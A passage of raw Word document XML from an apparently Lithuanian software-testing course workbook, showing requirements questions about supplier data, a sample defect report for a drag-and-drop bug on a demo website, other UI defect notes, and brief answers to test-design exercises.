      <w:r w:rsidRPr="00AD4464">
        <w:t>Ar skiriasi duomenys apie tiekėjus priklausomai nuo to, pirkta iš jų ar ne?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kokia papildomą informaciją turime saugoti apie prekių pajamavimą?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kokia informacija naudojama pajamuojant prekes?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Ar tik sandėlininkas gali dirbti su tiekėjų informaciją? Kas dar turi pasiekti tiekėjo duomenis?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kokius veiksmus su tiekėjo duomenimis gali atlikti sandėlininkas?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Ar reikia saugoti sąskaitas-faktūras? Ar tam reikalingas dokumentų saugojimas / skenavimas?</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3433A9" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>KLAIDŲ REGISTRAVIMAS</w:t>
      </w:r>
      <w:r w:rsidR="00B37E76">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pavyzd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7178"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>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6" w:name="_Toc14392548"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Defekto ataskaita</w:t>
            </w:r>
            <w:bookmarkEnd w:id="356"/>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7" w:name="_Toc14392549"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
            <w:bookmarkEnd w:id="357"/>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58" w:name="_Toc14392550"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>#_1</w:t>
            </w:r>
            <w:bookmarkEnd w:id="358"/>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59" w:name="_Toc14392551"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Testuotojas</w:t>
            </w:r>
            <w:bookmarkEnd w:id="359"/>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0" w:name="_Toc14392552"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Vardenis Pavardenis</w:t>
            </w:r>
            <w:bookmarkEnd w:id="360"/>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1" w:name="_Toc14392553"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Data</w:t>
            </w:r>
            <w:bookmarkEnd w:id="361"/>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2" w:name="_Toc14392554"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>2019-01-10</w:t>
            </w:r>
            <w:bookmarkEnd w:id="362"/>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3" w:name="_Toc14392555"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Pavadinimas</w:t>
            </w:r>
            <w:bookmarkEnd w:id="363"/>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4" w:name="_Toc14392556"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Interractions -&gt; Droppable: Pilkas komponentas neatkeičia spalvos ir teksto po balto komponento pašalinimo iš jo ribų</w:t>
            </w:r>
            <w:bookmarkEnd w:id="364"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>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5" w:name="_Toc14392557"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Defekto apibūdinimas</w:t>
            </w:r>
            <w:bookmarkEnd w:id="365"/>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6" w:name="_Toc14392558"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
            <w:bookmarkEnd w:id="366"/>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6D6D69" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:hyperlink r:id="rId145" w:history="1">
              <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://demoqa.com/droppable/</w:t>
              </w:r>
            </w:hyperlink>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7" w:name="_Toc14392559"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Defekto aprašymas</w:t>
            </w:r>
            <w:bookmarkEnd w:id="367"/>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8" w:name="_Toc14392560"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Kai baltas komponentas su tekstu “Drag me to my target” yra patraukiamas į komponentą su užrašu “Drop here”, pastarasis komponentas pakeičia spalvą ir tekstą – tampa </w:t>
            </w:r>
            <w:r w:rsidR="0045625F" w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>geltonas su užrašu “Dropped!”. T</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ačiau kai baltas komponentas yra patraukiamas iš </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>pakeitusio spalvą komponento, pastarojo spalva ir tekstas neatkeičiami atgal į pradinę būseną.</w:t>
            </w:r>
            <w:bookmarkEnd w:id="368"/>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69" w:name="_Toc14392561"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Ekrano nuotrauka</w:t>
            </w:r>
            <w:bookmarkEnd w:id="369"/>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C35D02" w:rsidP="00372B3A">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="370" w:name="_Toc14392562"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D67ACB4" wp14:editId="3D5966E8">
                  <wp:extent cx="954405" cy="914400"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2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54405" cy="914400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:bookmarkEnd w:id="370"/>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1" w:name="_Toc14392563"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Platforma</w:t>
            </w:r>
            <w:bookmarkEnd w:id="371"/>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en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="372" w:name="_Toc14392564"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">MacOS </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>10.14.3</w:t>
            </w:r>
            <w:bookmarkEnd w:id="372"/>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3" w:name="_Toc14392565"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Naršyklė</w:t>
            </w:r>
            <w:bookmarkEnd w:id="373"/>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4" w:name="_Toc14392566"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Chrome 73.0.3683.103 (Official Build) (64-bit)</w:t>
            </w:r>
            <w:bookmarkEnd w:id="374"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>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5" w:name="_Toc14392567"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Prioritetas</w:t>
            </w:r>
            <w:bookmarkEnd w:id="375"/>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6" w:name="_Toc14392568"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:bookmarkEnd w:id="376"/>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7" w:name="_Toc14392569"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Svarba</w:t>
            </w:r>
            <w:bookmarkEnd w:id="377"/>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8" w:name="_Toc14392570"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:bookmarkEnd w:id="378"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1379"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79" w:name="_Toc14392571"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Priskirta (kam?)</w:t>
            </w:r>
            <w:bookmarkEnd w:id="379"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3621"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bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="380" w:name="_Toc14392572"/>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>programuotojas</w:t>
            </w:r>
            <w:bookmarkEnd w:id="380"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Kiti defektai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Interractions -&gt; Resizable: Keturkampis gali būti išdidintas daugiau nei palaiko konteineris, kuriame jis yra. Dėl to prarandamas estetinis vaizdas, išdarkomas dizainas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Interractions -&gt; Sortable: Kiekvieno įrašo rėmėlio kairėje pusėjė yra rodomos rodyklytės kuria linkme galima judėti. Tai klaidina, nes yra noras pataikyti į rodiklyte ir tokiu būdu pastumti įrašą į viršų, arba į apačią.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Interractions -&gt; Selectable: Nėra galimybės „atžymėti“ visų įrašų, jei jau buvo pažymėtas bent vienas. T.y. kai tik įeiname į „Selectable“ puslapį, nei vienas komponentas nėra pažymėtas. Tačiau vos paspaudžiame ant kurio nors komponento, nėra galimybės atstatyti būsenos, reikia perkrauti puslapį. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="005A388A" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r w:rsidR="005C21C4" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC14E0" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C933E5" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Taikyti testavimo atvejų kūrimo technikas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C933E5" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>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STRUKTŪRINIO TESTAVIMO TECHNIKOS</w:t>
      </w:r>
      <w:r w:rsidR="000C4614">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>a) 6, b) 4, c) 6.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C933E5" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SPECIFIKACIJA BESIREMIANČIOS TESTAVIMO TECHNIKOS</w:t>
      </w:r>
      <w:r w:rsidR="000C4614">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C933E5" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:object w:dxaOrig="6384" w:dyaOrig="5856">
          <v:shape id="_x0000_i1089" type="#_x0000_t75" style="width:318pt;height:292.5pt" o:ole="">
            <v:imagedata r:id="rId147" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1089" DrawAspect="Content" ObjectID="_1636399723" r:id="rId148"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">1 TC </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>2 TC. Pakanka vieto testavimo atvejo, tačiau, galima išskaidyti žingsnius ir turėtu 2 TC, kurie n</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ėra stipriai persidengiantys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003B3B0F" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2b</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E350EA" w:rsidRPr="00AD4464" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
